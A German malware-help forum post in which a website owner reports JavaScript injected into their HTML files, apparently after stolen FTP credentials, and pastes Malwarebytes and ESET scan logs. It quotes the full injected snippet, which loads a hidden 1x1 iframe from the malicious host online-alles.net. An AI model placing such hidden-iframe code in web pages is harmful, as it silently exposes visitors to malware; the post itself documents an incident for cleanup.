![]() |
|
Plagegeister aller Art und deren Bekämpfung: Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: BürorechnerWindows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
![]() | #1 |
![]() | ![]() Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner So, ich poste jetzt nochmal aus dem alten Thema die Logs der beiden Rechner in jeweils eigenem Thread, damit niemand mit den Logs durcheinanderkommt. Bevor ich hier zum Einstieg auch nochmal die Original-Problembeschreibung reinkopiere, möchte ich noch kurz die Vermutung äußern, dass da Ganze mit dem FTP-Client FlashFXP zu tun hat, von dem ich vor ein paar Jahren die Lizenz gekauft habe. Es scheinen nur Server betriffen zu sein, deren FTP-Daten dort gespeichert sind - nicht aber die, die ich in FireFTP im Firefox verwalte. ORIGINAL-PROBLEMBESCHREIBUNG aus dem Thread http://www.trojaner-board.de/121065-...-trojaner.html Code:
ATTFilter Hallo zusammen, ich sitze gerade ziemlich ratlos vor dem Rechner und erhoffe mir hier eine "Erleuchtung". In einigen Webseiten - ausschließlich HTML-Dateien - auf die ich per FTP zugreife, hat sich der nachfolgende Code eingeschlichen, wegen dem zum einen Google Adwords die entsprechenden Kampagnen blockt und zum anderen Kunden Warnungen bekommen, dass die Seiten schädlich sind: <body><!--c3284d--><script>var url="hxxp://online-alles.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibili ty: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script><!--/c3284d--> Leider bin ich beim Googeln nicht weiter gekommen, denn die Verlinkung zu online-alles.net als Malware wird kaum thematisiert. Auf Nachfrage beim Support des Providers HostEurope wurde ich darauf verwiesen, dass ich vermutlich einen Trojaner auf dem Rechner habe, der die FTP-Passwörter ausspioniert und es ermöglicht hat, dass der oben gepostete Code am 17.6.2012 in die HTML-Dateien eingefügt wurde. Als FTP-Client nutze ich hauptsächlich FlashFXP, zum anderen aber auch den Client von Firefox. Ich habe mich hier am Board etwas umgeschaut und habe nun mit Malwarebytes sowohl den Laptop als auch den Bürorechner auf Trojaner gecheckt und wurde auch fündig. Nachfolgend poste ich die beiden Logfiles und hoffe, dass mir jemand sagen kann, was ich mir da eingefangen hatte und ob einer dieser Trojaner die Passwörter abgefangen haben könnte. Oder habe ich womöglch noch etwas auf dem Rechner, was Malwarebytes nicht gefunden hat? Ich hatte zuvor schon, bevor ich auf dieses Forum gestoßen bin, mit TrojanHunter mein System gecheckt. Damit wurden angebliche Trojaner in alten Download-Dateien aus den Jahren 2007-2009 gefunden, die ich daraufhin gelöscht habe. Glaube aber nicht, dass sich die Auslöser drunter befunden haben. Es wäre toll, wenn mir hier jemand hilfreich unter die Arme greifen könnte. Schritt 1 - Malwarebytes Quick Scan: Code:
ATTFilter Malwarebytes Anti-Malware 1.62.0.1300 www.malwarebytes.org Datenbank Version: v2012.08.02.07 Windows Vista Service Pack 2 x86 NTFS Internet Explorer 8.0.6001.19272 Max Mustermann:: XXXX-OFFICE [Administrator] 02.08.2012 16:50:28 mbam-log-2012-08-02 (16-50-28).txt Art des Suchlaufs: Quick-Scan Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM Deaktivierte Suchlaufeinstellungen: P2P Durchsuchte Objekte: 229011 Laufzeit: 9 Minute(n), 2 Sekunde(n) Infizierte Speicherprozesse: 0 (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: 0 (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: 1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Free Registry Cleaner for Vista_is1 (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. Infizierte Registrierungswerte: 0 (Keine bösartigen Objekte gefunden) Infizierte Dateiobjekte der Registrierung: 0 (Keine bösartigen Objekte gefunden) Infizierte Verzeichnisse: 2 C:\Program Files\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. Infizierte Dateien: 6 C:\Program Files\Free Registry Cleaner for Vista\backuphkcu.REG (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\Program Files\Free Registry Cleaner for Vista\RegCleanerForVista.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\Program Files\Free Registry Cleaner for Vista\unins000.dat (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\Program Files\Free Registry Cleaner for Vista\unins000.exe (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Registry Cleaner for Vista\Uninstall Free Registry Cleaner for Vista.lnk (Rogue.FreeRegistryCleanerForVista) -> Erfolgreich gelöscht und in Quarantäne gestellt. (Ende) Schritt 2 - ESET Komplettscan: Code:
ATTFilter ESETSmartInstaller@High as CAB hook log: OnlineScanner.ocx - registred OK # version=7 # iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339) # OnlineScanner.ocx=1.0.0.6583 # api_version=3.0.2 # EOSSerial=4e095949c714694883166ebeaed138f6 # end=stopped # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2012-08-08 10:39:51 # local_time=2012-08-08 12:39:51 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.0.6002 NT Service Pack 2 # compatibility_mode=1280 16777215 100 0 0 0 0 0 # compatibility_mode=2304 16777215 100 0 0 0 0 0 # compatibility_mode=3584 16777215 100 0 0 0 0 0 # compatibility_mode=5892 16776573 100 100 59918 181943261 0 0 # compatibility_mode=8192 67108863 100 0 132 132 0 0 # scanned=333655 # found=3 # cleaned=0 # scan_time=11858 C:\downloads\Tools\Chopper XP\chopper.exe möglicherweise unbekannter Virus NewHeur_PE Virus (Säubern nicht möglich) 00000000000000000000000000000000 I C:\downloads\Tools\Chopper XP\chopper.zip möglicherweise unbekannter Virus NewHeur_PE Virus (Säubern nicht möglich) 00000000000000000000000000000000 I C:\downloads\Tools\FLV Converter\Setup59_FreeFlvConverter.exe Mehrere Bedrohungen (Säubern nicht möglich) 00000000000000000000000000000000 I # version=7 # iexplore.exe=8.00.6001.18702 (longhorn_ie8_rtm(wmbla).090308-0339) # OnlineScanner.ocx=1.0.0.6583 # api_version=3.0.2 # EOSSerial=4e095949c714694883166ebeaed138f6 # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=false # antistealth_checked=true # utc_time=2012-08-09 02:31:59 # local_time=2012-08-09 04:31:59 (+0100, Mitteleuropäische Sommerzeit) # country="Germany" # lang=1031 # osver=6.0.6002 NT Service Pack 2 # compatibility_mode=1280 16777215 100 0 0 0 0 0 # compatibility_mode=2304 16777215 100 0 0 0 0 0 # compatibility_mode=3584 16777215 100 0 0 0 0 0 # compatibility_mode=5892 16776573 100 100 94554 181977897 0 0 # compatibility_mode=8192 67108863 100 0 34768 34768 0 0 # scanned=1893521 # found=3 # cleaned=0 # scan_time=34350 C:\downloads\Tools\Chopper XP\chopper.exe probably unknown NewHeur_PE virus (unable to clean) 00000000000000000000000000000000 I C:\downloads\Tools\Chopper XP\chopper.zip probably unknown NewHeur_PE virus (unable to clean) 00000000000000000000000000000000 I C:\downloads\Tools\FLV Converter\Setup59_FreeFlvConverter.exe multiple threats (unable to clean) 00000000000000000000000000000000 I Schritt 3 - Malwarebytes Komplettscan: Code:
ATTFilter Malwarebytes Anti-Malware 1.62.0.1300 www.malwarebytes.org Datenbank Version: v2012.08.09.10 Windows Vista Service Pack 2 x86 NTFS Internet Explorer 8.0.6001.19272 Max Mustermann :: MAX-OFFICE [Administrator] 09.08.2012 21:28:06 mbam-log-2012-08-09 (21-28-06).txt Art des Suchlaufs: Vollständiger Suchlauf (C:\|D:\|G:\|P:\|Q:\|) Aktivierte Suchlaufeinstellungen: Speicher | Autostart | Registrierung | Dateisystem | Heuristiks/Extra | HeuristiKs/Shuriken | PUP | PUM Deaktivierte Suchlaufeinstellungen: P2P Durchsuchte Objekte: 2104471 Laufzeit: 6 Stunde(n), 13 Minute(n), 40 Sekunde(n) Infizierte Speicherprozesse: 0 (Keine bösartigen Objekte gefunden) Infizierte Speichermodule: 0 (Keine bösartigen Objekte gefunden) Infizierte Registrierungsschlüssel: 0 (Keine bösartigen Objekte gefunden) Infizierte Registrierungswerte: 0 (Keine bösartigen Objekte gefunden) Infizierte Dateiobjekte der Registrierung: 0 (Keine bösartigen Objekte gefunden) Infizierte Verzeichnisse: 0 (Keine bösartigen Objekte gefunden) Infizierte Dateien: 1 C:\downloads\Tools\PantsOff\pantsoff.exe (PUP.Pantsoff.PasswordFinder) -> Erfolgreich gelöscht und in Quarantäne gestellt. (Ende) Heute morgen wurde mit eine Hardcopy einer Microsoft Security Essentials Warnmeldung weitergeleitet, die bei einer der immer noch Malware-versuchten Seiten angeschlagen hat. Dort wurde ein Trojan:JS/Iframe.BT erkannt. Vielleicht bringt uns das weiter? Danke in jedem Fall schon mal für die Unterstützung! |
Themen zu Malware-Code "online-alles.net" in HTML-Seiten - Trojaner? --- Teil 1: Bürorechner |
administrator, ausspioniert, converter, escan, explorer, firefox, gelöscht, google, hilfreich, hook, iexplore.exe, kunde, lizenz, logfiles, malwarebytes, microsoft, newheur_pe virus, nicht möglich, pup.pantsoff.passwordfinder, ratlos, registry, registry cleaner, rogue.freeregistrycleanerforvista, scan, security, server, software, system, trojan:js/iframe.bt, trojaner, trojaner?, virus, vista |